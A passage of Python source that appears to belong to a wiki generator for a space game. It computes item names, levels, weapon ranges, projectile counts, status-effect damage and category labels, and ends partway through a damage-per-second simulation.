        shared = [ itemDataDict[rid] for rid in rangeData['items'] if itemDataDict[rid] in funcItemList ]
        if len(shared) > 1:
            return shared
    nameInfo = SplitNameIntoBaseNameAndItemLevel(item['name'])
    baseName = nameInfo['fullNameMinusLevel']
    if baseName != item['name']:
        return [ v for v in funcItemList
                 if SplitNameIntoBaseNameAndItemLevel(v['name'])['fullNameMinusLevel'] == baseName ]
    return [ item ]
def GetRangeDataForItem(item, skipVariants=False):
    """Find the level-range record containing this item, or None.

    Unless skipVariants is set, a variant-style id ("<base>v<N>[_M]") also
    matches its base id, provided the range defines that variant index.
    """
    lookupId = item['id']
    variantIdx = None
    if not skipVariants:
        variantMatch = re.match(r'^(.+?)v(\d+)(_\d+)?$', lookupId)
        if variantMatch:
            lookupId = variantMatch.group(1)
            variantIdx = int(variantMatch.group(2))
    for rangeData in itemRangeData.values():
        directHit = item['id'] in rangeData['items']
        variantHit = (variantIdx is not None
                      and lookupId in rangeData['items']
                      and len(rangeData['variants']) > variantIdx)
        if directHit or variantHit:
            return rangeData
    return None
def GetVariantDataForItem(item):
    """Return the variant record for *item*, or None.

    Best-effort: missing/negative 'variantID' (or any lookup failure)
    yields None.
    """
    try:
        variantId = item['variantID']
        if variantId >= 0:
            return itemVariantData[variantId]
    except:
        pass
    return None
def GetCraftingDataForItem(item):
    """Return the crafting recipe record for *item*, or None.

    Checks the craftable-item table first; micro gates (except "loca" ones)
    derive their recipe from the star system matching their name prefix.
    """
    for craftData in itemCraftableData.values():
        if item['id'] in craftData['items']:
            return craftData
    loweredName = item['name'].lower()
    if 'micro gate' in loweredName and 'loca' not in loweredName:
        systemPrefix = item['name'].split(' ')[-1]
        systemInfo = GalaxyUtils.GetSystemByPrefix(systemPrefix)
        if systemInfo:
            return GalaxyUtils.GetCraftingRecipeForSystem(systemInfo)
    return None
def GetItemById(id):
    """Look up an item record by id; None when unknown.

    Narrowed from a bare `except:` (which also swallowed SystemExit /
    KeyboardInterrupt) to the two failures a dict lookup can produce:
    missing key and unhashable key.
    """
    try:
        return itemDataDict[id]
    except (KeyError, TypeError):
        return None
def GetItemByName(name, itemList=...):
    """Return the first item whose 'name' equals *name*, or None.

    itemList restricts the search pool (defaults to all items); any lookup
    failure (e.g. a record without a 'name' key) yields None.
    """
    if itemList is ...:
        itemList = itemData
    try:
        return next((candidate for candidate in itemList if candidate['name'] == name), None)
    except:
        pass
    return None
def SplitNameIntoBaseNameAndItemLevel(input):
    """Split an item name into base name, level token and weapon postfix.

    Examples: "Laser Cannon II" -> base "Laser Cannon", level II (idx 1);
    "Torpedo V Volley" -> base "Torpedo", level V, postfix "Volley".

    Returns a dict with:
      name               - base name with level and postfix removed
      fullNameMinusLevel - base name with the postfix re-attached
      levelDisplay       - the raw token inspected for a level (kept even
                           when it turned out not to be a level)
      levelIdx           - 0-based level index, or None
      namePostfix        - trailing postfix word, or None
    """
    romanLevels = [ "I", "II", "III", "IV", "V", "VI", "VII", "VIII", "IX", "X", "XI", "XII", "XIII", "XIV", "XV", "XVI", "XVII", "XVIII", "XIX", "XX" ]
    wordLevels = [ "ONE", "TWO", "THREE", "FOUR", "FIVE", "SIX", "SEVEN", "EIGHT", "NINE", "TEN" ]
    digitLevels = [ "1", "2", "3", "4", "5", "6", "7", "8", "9", "10" ]
    postfixWords = [ "ARRAY", "BARRAGE", "CLOUD", "CLUSTER", "SMALL ARRAY", "STORM", "TORPEDO", "VOLLEY" ]
    cleaned = input.strip()
    parts = cleaned.split(' ')
    name = cleaned
    postfix = None
    # A trailing (possibly pluralized) postfix word pushes the level token
    # one position left.
    trailingToken = parts[-1].upper().rstrip('S')
    if trailingToken in postfixWords and len(parts) > 1:
        postfix = parts[-1]
        levelToken = parts[-2].upper().rstrip('S')
        levelTokenOrig = parts[-2]
        name = name.replace(' {}'.format(postfix), '')
    else:
        levelToken = trailingToken
        levelTokenOrig = parts[-1]
    levelIdx = None
    for levelList in (romanLevels, wordLevels, digitLevels):
        if levelToken in levelList:
            levelIdx = levelList.index(levelToken)
            break
    if levelIdx is not None:
        # Drop the level token plus its preceding space.
        name = name[:-1 * len(levelTokenOrig) - 1]
    fullNameMinusLevel = '{} {}'.format(name, postfix) if postfix else name
    return { 'name': name, 'fullNameMinusLevel': fullNameMinusLevel, 'levelDisplay': levelTokenOrig, 'levelIdx': levelIdx, 'namePostfix': postfix }
def IsBeamWeapon(item):
    """Heuristic: does this weapon behave like a beam?

    Beams have no projectile speed, guidance exactly 1, a lifetime of at
    most 1 and a locking range of at most 100; an explicit override list
    short-circuits the heuristic.
    """
    if "id" in item and item['id'] in beamWeaponOverrideIdList:
        return True
    # Any real projectile speed disqualifies it.
    for speedKey in ("initSpeed", "maxSpeed"):
        if speedKey in item and GeneralUtils.floatCmp(item[speedKey], '>', 0):
            return False
    if "guidance" not in item or GeneralUtils.floatCmp(item['guidance'], '!=', 1):
        return False
    if "life" not in item or GeneralUtils.floatCmp(GetItemLife(item), '>', 1):
        return False
    if "lockingRange" not in item or GeneralUtils.floatCmp(item['lockingRange'], '>', 100):
        return False
    return True
def GetItemMinRange(item):
    """Distance a projectile travels before it arms ('' when not applicable).

    Simple kinematics over the arming time: accelerate toward max speed,
    then cruise for whatever arming time remains.  Best-effort: any missing
    key leaves the result as ''.
    """
    rtnVal = ""
    itemGuidance = SmallConstants.guidanceLookup[item['guidance']] if 'guidance' in item else ''
    try:
        if GeneralUtils.floatCmp(item['armingTime'], '>', 0) and itemGuidance != 'NO_COLLISION':
            armTime = item['armingTime']
            v0 = item['initSpeed']
            vMax = item['maxSpeed']
            accel = item['acceleration']
            # Starting above the speed cap means we decelerate toward it.
            if GeneralUtils.floatCmp(v0, '>', vMax) and GeneralUtils.floatCmp(accel, '>', 0):
                accel = -accel
            timeToTopSpeed = abs(vMax - v0) / abs(accel)
            if GeneralUtils.floatCmp(timeToTopSpeed, '>', armTime):
                # Still accelerating when the round arms.
                rtnVal = armTime**2 * accel / 2 + armTime * v0
            else:
                # Accelerate to top speed, then cruise the remaining time.
                rtnVal = timeToTopSpeed**2 * accel / 2 + timeToTopSpeed * v0 + vMax * (armTime - timeToTopSpeed)
    except:
        pass
    return rtnVal
def GetItemRange(item):
    """Best-effort weapon range.

    Resolution order: per-name override; weaponType-5 items delegate to the
    sub-weapon; otherwise kinematics over the projectile lifetime for
    unguided/attached non-"Smart" projectiles; finally sub-weapon range or
    locking range fallbacks.  Returns 0 when nothing applies.
    """
    rtnVal = 0
    with suppress(AttributeError, KeyError):
        return Config.weaponRangeOverride[item['name']]
    subWeapon = GetItemSubWeapon(item)
    with suppress(KeyError):
        # weaponType 5 delegates entirely to its sub-weapon -- presumably a
        # carrier/launcher type; confirm against SmallConstants.
        if item['weaponType'] == 5 and subWeapon:
            return GetItemRange(subWeapon)
    itemGuidance = SmallConstants.guidanceLookup[item['guidance']] if 'guidance' in item else ''
    if 'Smart' not in item['name'] and itemGuidance in ['UNGUIDED', 'ATTACHED']:
        if 'weaponType' not in item or item['weaponType'] != 5:
            try:
                acceleration = item['acceleration']
                # Starting above the speed cap means deceleration toward it.
                if GeneralUtils.floatCmp(item['initSpeed'], '>', item['maxSpeed']) and GeneralUtils.floatCmp(acceleration, '>', 0):
                    acceleration *= -1
                # Time to reach top speed, then distance = accel phase + cruise phase.
                ttts = abs(item['maxSpeed'] - item['initSpeed']) / abs(acceleration)
                if GeneralUtils.floatCmp(ttts, '>', GetItemLife(item)):
                    rtnVal = GetItemLife(item)**2 * acceleration / 2 + GetItemLife(item) * item['initSpeed']
                else:
                    rtnVal = ttts**2 * acceleration / 2 + ttts * item['initSpeed'] + item['maxSpeed'] * (GetItemLife(item) - ttts)
            except:
                # Fallback for items missing acceleration data.
                # NOTE(review): this handler reads maxSpeed/initSpeed/life
                # directly, so a missing key HERE propagates out of the
                # function instead of being swallowed -- confirm intended.
                if item['maxSpeed'] > 0:
                    if item['maxSpeed'] != item['initSpeed'] and item['initSpeed'] > 0:
                        rtnVal = item['initSpeed'] * GetItemLife(item)
                    else:
                        rtnVal = item['maxSpeed'] * GetItemLife(item)
    try:
        if rtnVal == 0 and subWeapon:
            return GetItemRange(subWeapon)
    except:
        pass
    try:
        # augType 15 (turret) uses half the sub-weapon's range.
        if item['augType'] == 15 and rtnVal == 0 and subWeapon:
            return GetItemRange(subWeapon) * 0.5
    except:
        pass
    try:
        if rtnVal == 0 and item['lockingRange'] > 0:
            rtnVal = item['lockingRange']
    except:
        pass
    return rtnVal
def GetTurretSubWeapon(item):
    """Best-effort lookup of the projectile a turret augmentation fires.

    Finds the base sub-weapon via the turret's range record, then tries to
    upgrade it to the variant matching the turret's level.  Returns None on
    any failure (the bare except swallows everything).
    """
    try:
        rangeData = GetRangeDataForItem(item)
        # NOTE(review): indexes the range record with key 'range' where the
        # other helpers use 'items' -- confirm this key is correct.
        baseSubWeapon = GetItemById(rangeData['range'])
        nameInfo = SplitNameIntoBaseNameAndItemLevel(item['name'])
        if nameInfo['levelIdx'] is None or nameInfo['levelIdx'] == 0:
            return baseSubWeapon
        # Variant-style id ("<base>v<N>[_M]"): derive the level-matched id.
        m = re.match(r'^(.+?)v(\d+)(_\d+)?$', baseSubWeapon['id'])
        if m:
            realId = '{}_{}'.format(baseSubWeapon['id'], nameInfo['levelIdx'])
            if m.group(3):
                # Replace the existing "_M" suffix with the level index.
                # NOTE(review): the slice also removes the underscore, so the
                # rebuilt id has no '_' separator -- verify against real ids.
                replaceLen = len(m.group(3)) * -1
                realId = baseSubWeapon['id'][0:replaceLen]
                realId += str(nameInfo['levelIdx'])
            subWeapon = GetItemById(realId)
            if subWeapon:
                return subWeapon
        # Fall back to the sub-weapon's own range list, indexed by level.
        subRangeData = GetRangeDataForItem(baseSubWeapon)
        return GetItemById(subRangeData['items'][nameInfo['levelIdx']])
    except:
        pass
def GetItemSubWeapon(item):
    """Resolve the weapon this item actually fires, or None.

    Resolution order: per-name override from Config, the item's own
    'subWeaponID', then the turret lookup for augType 15.  Every step is
    best-effort; any failure falls through to the next.
    """
    try:
        return GetItemById(Config.subWeaponIDOverride[item['name']])
    except:
        pass
    try:
        return GetItemById(item['subWeaponID'])
    except:
        pass
    try:
        if item['augType'] == 15:  # turret augmentation
            return GetTurretSubWeapon(item)
    except:
        pass
    return None
def DisplayDamageAsPerSecond(item):
    """Should this weapon's damage be displayed as damage-per-second?

    True for continuous-damage weapons, zero fire-rate (beam-like) weapons
    and a set of known per-second weapon families; deathtraps are explicitly
    excluded.
    """
    if GetItemContinuousDamageTotalDamage(item) is not None:
        return True
    if 'fireRate' in item and GeneralUtils.floatCmp(item['fireRate'], '==', 0):
        return True
    loweredName = item['name'].lower()
    if 'deathtrap' in loweredName or 'death trap' in loweredName:
        return False
    perSecondFamilies = ('thunder', 'bug zapper', 'tornadian hurricane',
                         'radicane', 'firestorm', 'light saw')
    if any(family in loweredName for family in perSecondFamilies):
        return True
    return 'tornadian' in loweredName and 'storm' in loweredName
def DisplayDamageAsPerHit(item):
    """True when the item has a known total hit count (damage shown per hit)."""
    hitCount = GetItemTotalHitCount(item)
    return hitCount is not None
def GetNumOfDamagingProjectiles(item, isForDisplay=False):
    """How many damaging projectiles one volley of *item* produces.

    With isForDisplay=True returns the per-volley count shown on the wiki;
    otherwise returns the effective count used for damage math (per-second
    weapons multiply by projectile lifetime).  Resolution order: per-name
    override, turret sub-weapon delegation, known weapon families, variant
    data, then description parsing.
    """
    f = GetNumOfDamagingProjectiles
    if "cloudTypeProjCountRegex" not in f.__dict__:
        # Compile once and cache on the function object.
        f.cloudTypeProjCountRegex = re.compile(r'.* fires (\d+) \[subWeapon\]s', re.I)
    cloudTypeProjCountRegex = f.cloudTypeProjCountRegex
    if item['name'] in Config.projectileCountOverride:
        return Config.projectileCountOverride[item['name']]
    try:
        if item['augType'] == 15:  # turret: count comes from the sub-weapon
            subWeapon = GetItemSubWeapon(item)
            if subWeapon: return GetNumOfDamagingProjectiles(subWeapon, isForDisplay)
    except:
        pass
    nameCmp = item['name'].lower()
    amount = item['amount'] if 'amount' in item and item['amount'] > 0 else 1
    lt = GetItemLife(item)
    if 'thunder' in nameCmp or 'bug zapper' in nameCmp:
        if not isForDisplay and lt is not None:
            return lt * amount
        return amount
    if 'light saw' in nameCmp:
        if not isForDisplay and lt is not None:
            return lt * amount
        return amount
    # BUG FIX: these three used exact '==' comparison, so leveled names like
    # "Firestorm II" never matched.  Use substring matching, consistent with
    # the identical family check in DisplayDamageAsPerSecond.
    if 'tornadian hurricane' in nameCmp or 'radicane' in nameCmp or 'firestorm' in nameCmp:
        if not isForDisplay:
            return lt
        return amount
    if 'tornadian' in nameCmp and 'storm' in nameCmp:
        if not isForDisplay:
            return lt
        return amount
    varData = GetVariantDataForItem(item)
    if varData and varData['overrideName'].lower() == "cluster [name] torpedo":
        if not isForDisplay:
            return 10 * amount
        return amount
    if 'broadside' in nameCmp:
        if 'dark light' in nameCmp: return 8
        if 'double' in nameCmp: return 10
        return 5
    if 'radial' in nameCmp and 'black light cannon' not in nameCmp and 'resonite' not in nameCmp:
        if 'plus' in nameCmp: return 16 * amount
        return 8 * amount
    if 'black light volley' in nameCmp:
        return 8 * amount
    if 'black light bombard' in nameCmp:
        return 8 * 5
    if 'cake bomb' in nameCmp:
        return 16 # Could be 15... Need to re-test
    if amount > 1: return amount
    # Last resorts: parse "fires N" out of the variant or item description.
    try:
        varData = GetVariantDataForItem(item)
        match = cloudTypeProjCountRegex.match(varData['descriptionAppend'])
        return int(match.group(1))
    except:
        pass
    try:
        varDesc = item['variant']['deviceOverride']['descriptionOverride']
        match = cloudTypeProjCountRegex.match(varDesc)
        return int(match.group(1))
    except:
        pass
    try:
        desc = GetItemDescription(item, useHtmlForLinks=False, performLinkReplacement=False)
        match = re.match(r'.*\bfires (\d+) ', desc, re.I)
        return int(match.group(1))
    except:
        pass
    return amount
def GetItemTotalHitCount(item):
    """Total hits one volley lands, or None when unknown.

    The per-name Config override wins; otherwise the value is inherited
    from the sub-weapon when it has one.
    """
    with suppress(AttributeError, KeyError):
        return Config.weaponHitCountOverride[item['name']]
    subWeapon = GetItemSubWeapon(item)
    if not subWeapon:
        return None
    inherited = GetItemTotalHitCount(subWeapon)
    return inherited if inherited else None
def GetItemContinuousDamageTotalDamage(item):
    """Total damage for continuous-damage weapons, or None when not one.

    The per-name Config override wins; otherwise the value is inherited
    from the sub-weapon when it has one.
    """
    with suppress(AttributeError, KeyError):
        return Config.weaponContinuousDamageTotalDamageOverride[item['name']]
    subWeapon = GetItemSubWeapon(item)
    if not subWeapon:
        return None
    inherited = GetItemContinuousDamageTotalDamage(subWeapon)
    return inherited if inherited else None
def GetItemLife(item):
    """Projectile lifetime in seconds, or None when unknown.

    Resolution order: per-name Config override, the sub-weapon's lifetime,
    then the item's own 'life' key.
    """
    with suppress(AttributeError, KeyError):
        return Config.weaponLifeOverride[item['name']]
    subWeapon = GetItemSubWeapon(item)
    if subWeapon:
        inherited = GetItemLife(subWeapon)
        if inherited:
            return inherited
    with suppress(KeyError):
        return item['life']
    return None
def GetItemTotalDamagePerVolley(item):
    """Total damage for one full volley of the item.

    Continuous-damage weapons report their fixed total; per-hit weapons
    multiply per-round damage by hit count; everything else multiplies by
    projectile count.  Status-effect damage is added for all item types
    except shields (whose effects are resistances, not damage).

    Cleanup: removed the unused `message` local and the dead pre-inits of
    `effectDamage`/`totalDamage` (every branch assigns totalDamage).
    """
    ctd = GetItemContinuousDamageTotalDamage(item)
    if ctd:
        totalDamage = ctd
    elif DisplayDamageAsPerHit(item):
        totalDamage = GetDamagePerRoundForItem(item) * GetItemTotalHitCount(item)
    else:
        totalDamage = GetDamagePerRoundForItem(item) * GetNumOfDamagingProjectiles(item)
    if GetItemType(item) != 'Shield':
        effectDamage = GetItemEffectDamage(item)
        if effectDamage:
            totalDamage += effectDamage
    return totalDamage
def GetItemMaxSpeed(item):
    """Top projectile speed, delegating to the sub-weapon; None when unset/zero."""
    subWeapon = GetItemSubWeapon(item)
    if subWeapon:
        return GetItemMaxSpeed(subWeapon)
    hasPositiveSpeed = 'maxSpeed' in item and GeneralUtils.floatCmp(item['maxSpeed'], '>', 0)
    return item['maxSpeed'] if hasPositiveSpeed else None
def GetItemInitialSpeed(item):
    """Initial projectile speed, delegating to the sub-weapon; None when unset/zero."""
    subWeapon = GetItemSubWeapon(item)
    if subWeapon:
        return GetItemInitialSpeed(subWeapon)
    hasPositiveSpeed = 'initSpeed' in item and GeneralUtils.floatCmp(item['initSpeed'], '>', 0)
    return item['initSpeed'] if hasPositiveSpeed else None
def GetRaceForItem(item):
    """Resolve the item's race id to its NPR display name."""
    raceId = item['race']
    return SmallConstants.GetNprNameFromId(raceId)
def GetItemDamageType(item):
    """The item's damage type as Title Case text; None when it has no damageType key."""
    with suppress(KeyError):
        rawType = SmallConstants.damageTypeLookup[item['damageType']]
        return GeneralUtils.CamelCaseToTitleCase(rawType)
    return None
def GetShieldEffectIconsForItem(item, type="both"):
    """Build the HTML icon spans for a shield's status effects.

    type selects "positive", "negative" or "both" icon groups.  Each effect
    maps (via Config.shieldEffectIconClassMapping) either to a CSS class or,
    with a "[html]" prefix, to a literal HTML snippet; unmapped effects are
    silently skipped.

    Refactor: the positive and negative loops were verbatim duplicates
    differing only in the span class -- extracted into a local helper.
    """
    def renderIcons(effectNames, spanClass):
        # One span per mapped effect; unmapped names are skipped.
        html = ''
        for effectName in effectNames:
            with suppress(KeyError):
                className = Config.shieldEffectIconClassMapping[effectName]
                if className[:6].lower() == '[html]':
                    iconHtml = className[6:]
                    html += '<span class="{}" title="{}">{}</span>'.format(spanClass, effectName, iconHtml)
                else:
                    html += '<span class="{} {}" title="{}"></span>'.format(spanClass, className, effectName)
        return html

    statusList = GetShieldStatusEffectList(item)
    rtnVal = ""
    if type == "both" or type == "positive":
        rtnVal += renderIcons(statusList['positiveEffects'], 'shieldEffectPositive')
    if type == "both" or type == "negative":
        rtnVal += ' '
        rtnVal += renderIcons(statusList['negativeEffects'], 'shieldEffectNegative')
    return rtnVal.strip()
def GetDamageTypeIconForItem(item):
    """HTML span for the item's damage-type icon; '' when the type is unmapped.

    The Config mapping value is either a CSS class or, with a "[html]"
    prefix, a literal HTML snippet for the icon body.
    """
    damageType = GetItemDamageType(item)
    with suppress(KeyError):
        mappingKey = damageType.title().replace(' ', '')
        className = Config.damageTypeIconClassMapping[mappingKey]
        if className[:6].lower() == '[html]':
            iconHtml = className[6:]
            return '<span class="damageType{}" title="Damage Type: {}">{}</span>'.format(mappingKey, damageType, iconHtml)
        return '<span class="damageType{} {}" title="Damage Type: {}"></span>'.format(mappingKey, className, damageType)
    return ''
def GetEffectIconForItem(item):
    """Placeholder: per-effect icons are not rendered yet; always returns ''."""
    return ''
def GetShieldStatusEffectList(item):
    """Expand a shield's built-in effect (plus any extra resistance) into the
    positive/negative status-effect names its icons represent.

    Returns {'positiveEffects': [...], 'negativeEffects': [...]}, both
    sorted; both lists are empty for non-shield items.
    """
    itemType = SmallConstants.typeLookup[item['type']].replace('_WEAPON', '').title()
    rtnList = { 'positiveEffects': set(), 'negativeEffects': set() }
    if itemType == 'Shield':
        if item['effect'] > 0:
            effectName = GetShieldEffectName(item, False)
            # Named shield families expand to fixed resist/weakness bundles;
            # anything unrecognized falls through as a single positive effect.
            if effectName == 'Tornadian':
                rtnList['positiveEffects'].add('Projectile')
                rtnList['negativeEffects'].add('Electrostatic')
            elif effectName == 'Vampire':
                rtnList['positiveEffects'].add('Gravity')
            elif effectName == 'Devimon':
                rtnList['positiveEffects'].add('Gravity')
                rtnList['positiveEffects'].add('Heat Resist')
            elif effectName == 'Enlightened':
                rtnList['positiveEffects'].add('Heat Resist')
                rtnList['negativeEffects'].add('Projectile')
            elif effectName == 'Solarion':
                rtnList['positiveEffects'].add('Heat Resist')
                rtnList['negativeEffects'].add('Projectile')
                rtnList['negativeEffects'].add('Frozen')
            elif effectName == 'Rock':
                rtnList['positiveEffects'].add('Explosive')
                rtnList['negativeEffects'].add('Laser')
                rtnList['negativeEffects'].add('Photonic')
            elif effectName == 'Refractive':
                rtnList['positiveEffects'].add('Laser')
                rtnList['positiveEffects'].add('Photonic')
                rtnList['negativeEffects'].add('Explosive')
            elif effectName == 'Andromedan':
                rtnList['positiveEffects'].add('Stealth - Andromedan')
                rtnList['negativeEffects'].add('Heat Weakness')
            elif effectName == 'Anti Gravity':
                rtnList['positiveEffects'].add('Gravity')
            elif effectName == 'Anti Nuclear':
                rtnList['positiveEffects'].add('Nuclear')
            elif effectName == 'Insulator':
                rtnList['positiveEffects'].add('Electrostatic')
            elif effectName == 'Human Ghostly':
                rtnList['positiveEffects'].add('Ghostly')
            elif effectName == 'Ascendant':
                rtnList['positiveEffects'].add('NPR Damage')
            elif effectName == 'Dark':
                rtnList['positiveEffects'].add('Gravity')
                rtnList['positiveEffects'].add('Cold Fusion')
            else:
                rtnList['positiveEffects'].add(effectName)
        # A shield may also carry one extra named resistance.
        with suppress(KeyError):
            if item['resistExtraEffect'] >= 0:
                effectName = SmallConstants.effectsData[item['resistExtraEffect']]['name']
                if effectName:
                    rtnList['positiveEffects'].add(effectName)
    # Deterministic ordering for display/diffing.
    rtnList['positiveEffects'] = sorted(list(rtnList['positiveEffects']))
    rtnList['negativeEffects'] = sorted(list(rtnList['negativeEffects']))
    return rtnList
def GetDescriptionForItemRangeList(itemList, enclosureStr=None):
    """Render the descriptions for one item level-range.

    Returns a single-element list when every level shares one description,
    otherwise one "<desc> -Level <lvl>" entry per level.  Each description
    is wrapped in enclosureStr (e.g. quote characters) when given.

    BUG FIX: descriptions are now paired with their items BEFORE empty ones
    are dropped.  Previously empties were filtered out of the description
    list while items were paired positionally, so one empty description
    shifted every later description onto the wrong item's level label.
    """
    if not enclosureStr:
        enclosureStr = ''
    pairs = [ (rangeItem, GetItemDescription(rangeItem)) for rangeItem in itemList ]
    pairs = [ (rangeItem, desc) for rangeItem, desc in pairs if desc ]  # skip empty descriptions
    descriptions = [ desc for _, desc in pairs ]
    if len(set(descriptions)) == 1:
        return [ "{1}{0}{1}".format(descriptions[0], enclosureStr) if descriptions[0] != '' else '' ]
    rtnList = []
    for rangeItem, desc in pairs:
        nameInfo = SplitNameIntoBaseNameAndItemLevel(rangeItem['name'])
        rtnList.append("{2}{0}{2} -Level {1}".format(desc, nameInfo['levelDisplay'], enclosureStr))
    return rtnList
def GetCategoryListForItem(item):
    """Collect the sorted list of wiki category names for an item.

    Categories come from: race page, rarity, item type, energy/ammo basis,
    seasonality, damage type, status effects, shield extra resistance,
    augmentation type, stealth flags and negative impact.
    """
    rtnSet = set()
    itemType = SmallConstants.typeLookup[item['type']].replace('_', ' ').title()
    nprPageName = WikiUtils.GetNprWikiPageByNprName(GetRaceForItem(item))
    if nprPageName:
        rtnSet.add(nprPageName)
    with suppress(KeyError):
        if item['equipCategory'] == 7:
            rtnSet.add('Ultra Rare')
    if itemType == 'Collectible':
        rtnSet.add('Collectible')
    if itemType == 'Primary Weapon':
        # Primary weapons are always energy based.
        rtnSet.add('Energy Based')
    if itemType == 'Secondary Weapon' and 'energyBased' in item:
        if item['energyBased']:
            rtnSet.add('Energy Based')
        else:
            rtnSet.add('Ammo Based')
    if 'seasonal' in item and item['seasonal']:
        rtnSet.add("Seasonal Items")
    damageCat = GetDamageTypeForItem(item, True)
    if damageCat:
        rtnSet.add(damageCat.replace(' Damage', ''))
        rtnSet.add('Damage:{}'.format(damageCat))
    effectList = GetEffectNameListForItem(item)
    for effect in effectList:
        # Bare effect name (minus the Damage/Resist/Weakness suffix) plus a
        # namespaced Effect: category for non-shields.
        rtnSet.add(effect.replace(' Damage', '').replace(' Resist', '').replace(' Weakness', ''))
        if itemType != 'Shield':
            rtnSet.add('Effect:{}'.format(effect))
        else:
            rtnSet.add(effect)
    with suppress(KeyError):
        if itemType == 'Shield':
            if item['resistExtraEffect'] >= 0:
                effectName = SmallConstants.effectsData[item['resistExtraEffect']]['name']
                if effectName:
                    rtnSet.add(effectName)
    if item['name'] == 'Radii Nanite Repair':
        rtnSet.add('Heat')
    # Augmentation types imply recharge/heat categories.
    augType = GetItemAugType(item)
    if augType == 'Fire Extinguisher':
        rtnSet.add('Heat')
    elif augType == 'Energy To Shield':
        rtnSet.add('Shield Recharge')
    elif augType == 'Radiation Charging':
        rtnSet.add('Energy Recharge')
        rtnSet.add('Heat')
    elif augType == 'S/E Balancer':
        rtnSet.add('Energy Recharge')
        rtnSet.add('Shield Recharge')
    elif augType in ['Andromedan Power Source', "Dark Energy Charging", "Dartian Converter", 'Solar Panel Upgrade', 'Shield To Energy', 'Devimon Energize']:
        rtnSet.add('Energy Recharge')
    elif augType in ['Dartian Hyperspace', "Hyperspace Recharge Booster"]:
        rtnSet.add('Hyperspace Recharge')
    if 'stealth' in item and item['stealth']:
        rtnSet.add('Stealthed')
    if 'Shield Repair' in rtnSet:
        rtnSet.add('Shield Recharge')
    # Any specific stealth effect also implies the umbrella Stealth category.
    stealthEffectList = ['Hidden by Smoke', 'Light Bending Stealth', 'Transparent Stealth', 'Absorbing Stealth', 'Reflecting Stealth', 'Stealth - Andromedan']
    for sn in stealthEffectList:
        if sn in rtnSet:
            rtnSet.add('Stealth')
            break
    if 'impact' in item and item['impact'] < 0:
        rtnSet.add('Negative Impact')
    return sorted(list(rtnSet))
def GetDamageTypeForItem(item, forCategoryUse=False):
    """The item's damage type as Title Case text, or None.

    With forCategoryUse=True the value is normalized for wiki categories:
    None/Unknown/Other are dropped and the Harvest types map to their
    Recharge categories.  Items without their own damage fall back to the
    sub-weapon's type.
    """
    damageType = None
    if 'damage' in item and item['damage'] > 0:
        try:
            rawType = SmallConstants.damageTypeLookup[item['damageType']]
            damageType = GeneralUtils.CamelCaseToTitleCase(rawType)
            if forCategoryUse:
                if damageType in ('None', 'Unknown', 'Other'):
                    damageType = None
                elif damageType == 'Hyperspace Harvest':
                    damageType = 'Hyperspace Recharge'
                elif damageType == 'Energy Harvest':
                    damageType = 'Energy Recharge'
        except:
            pass
    subWeapon = GetItemSubWeapon(item)
    if (not damageType or damageType == 'None') and subWeapon:
        damageType = GetDamageTypeForItem(subWeapon, forCategoryUse)
    return damageType
def GetItemEffectDamage(item, shipMass=..., amount=...):
    """Total damage dealt by one application of the item's status effect.

    shipMass and amount default to the configured reference ship mass and
    the item's projectile count.  Items with a sub-weapon delegate to it.
    Returns None when the item has no effect (or no 'effect' key).
    """
    if amount is ...:
        amount = GetNumOfDamagingProjectiles(item)
    if shipMass is ...:
        shipMass = Config.shipMassForDamageCalculation
    subWeapon = GetItemSubWeapon(item)
    if subWeapon: return GetItemEffectDamage(subWeapon, shipMass, amount)
    with suppress(KeyError):
        if item['effect'] >= 0:
            effectInfo = SmallConstants.effectsData[item['effect']]
            effectName = effectInfo['name']
            # Effect time stacks once per projectile, clamped to the cap.
            effectTime = item['effectTime'] * amount
            if 'cap' in effectInfo and GeneralUtils.floatCmp(effectInfo['cap'], '>', 0):
                effectTime = min(round(effectTime), effectInfo['cap'])
            if effectName == 'Radiation Damage':
                # Radiation is (6 * m * t/3) + (4 * m * t/3) + (2 * m * t/3) Where m is ship mass, t is effect time (using highest stacked time)
                # This simplifies down to a short 4 * m * t
                return round(4 * shipMass * effectTime, 2)
            elif effectName == 'Corrosion':
                # Corrosion damage is time remaining as damage per second. So 15 secs of corrosion with no refresh would be 15 + 14 + 13 ... + 1 damage
                return (effectTime + 1) * effectTime / 2
            else:
                # Flat per-second damage for every other effect type.
                return round(SmallConstants.effectDamagesData[effectName] * effectTime, 2)
def GetItemEffectDamagePerSecond(item, shipMass=..., amount=...):
    """Simulate sustained fire and return the item's status-effect DPS.

    Fires enough shots to drain one ammo clip (or 100 energy), stacking the
    effect time per shot (clamped to the effect's cap) and converting each
    elapsed whole second into damage.  shipMass and amount default to the
    configured reference mass and the item's projectile count.  Returns
    None when the item has no damaging effect or the simulation cannot run.
    """
    if amount is ...:
        amount = GetNumOfDamagingProjectiles(item)
    if shipMass is ...:
        shipMass = Config.shipMassForDamageCalculation
    subWeapon = GetItemSubWeapon(item)
    if subWeapon: return GetItemEffectDamagePerSecond(subWeapon, shipMass, amount)
    totalDamage = 0
    numShotsToTest = None
    with suppress(KeyError):
        if 'weaponType' in item and item['weaponType'] == 5:
            fireRate = 60
        elif 'fireRate' in item and GeneralUtils.floatCmp(item['fireRate'], '>', 0):
            fireRate = item['fireRate']
        else:
            # No fire rate probably means beam type weapon
            fireRate = 1 # For effect purposes, beams are applied at a rate of 1 per second
        if item['energyBased']:
            numShotsToTest = int(100 / item['ammoOrEnergyUsage'])
        else:
            numShotsToTest = int(item['ammoOrEnergyUsage'])
    if Config.debug: print("GetItemEffectDamagePerSecond: shots to test", numShotsToTest)
    if Config.debug: print("GetItemEffectDamagePerSecond: fire rate in use", fireRate)
    try:
        if numShotsToTest and item['effect'] >= 0:
            effectInfo = SmallConstants.effectsData[item['effect']]
            effectName = effectInfo['name']
            totalTime = 0          # stacked effect-seconds still pending
            timeSinceLastCalc = 0  # wall-clock seconds not yet converted to damage
            for i in range(0, numShotsToTest):
                if GeneralUtils.floatCmp(timeSinceLastCalc, '>=', 1):
                    secondsToCalc = math.floor(timeSinceLastCalc)
                    if effectName == 'Radiation Damage':
                        # Radiation is (6 * m * t/3) + (4 * m * t/3) + (2 * m * t/3) Where m is ship mass, t is effect time (using highest stacked time)
                        if GeneralUtils.floatCmp(secondsToCalc, '>', effectTime):
                            # Full damage calculation
                            totalDamage += 4 * shipMass * secondsToCalc
                        else:
                            t2End = totalTime / 3
                            t1End = t2End * 2
                            # tier 1 calculation
                            t1Seconds = min(math.floor(t1End), secondsToCalc)
                            totalDamage += 6 * shipMass * t1Seconds
